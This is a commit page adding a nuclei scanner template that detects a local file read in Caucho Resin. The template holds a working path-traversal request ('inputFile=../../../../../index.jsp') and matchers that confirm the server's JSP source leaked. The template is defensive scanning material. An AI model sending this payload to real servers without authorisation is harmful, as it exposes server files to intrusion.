Merge pull request #1336 from projectdiscovery/princechaddha-patch-5

Create resin-inputfile-fileread.yaml
patch-1
Prince Chaddha 2021-06-24 02:32:40 +05:30 committed by GitHub
commit bc7e8a80db
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 20 additions and 0 deletions

View File

@ -0,0 +1,20 @@
id: resin-inputfile-fileread
info:
name: Caucho Resin LFR
author: princechaddha
severity: high
tags: resin,caucho,lfr
requests:
- method: GET
path:
- "{{BaseURL}}/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %"
part: body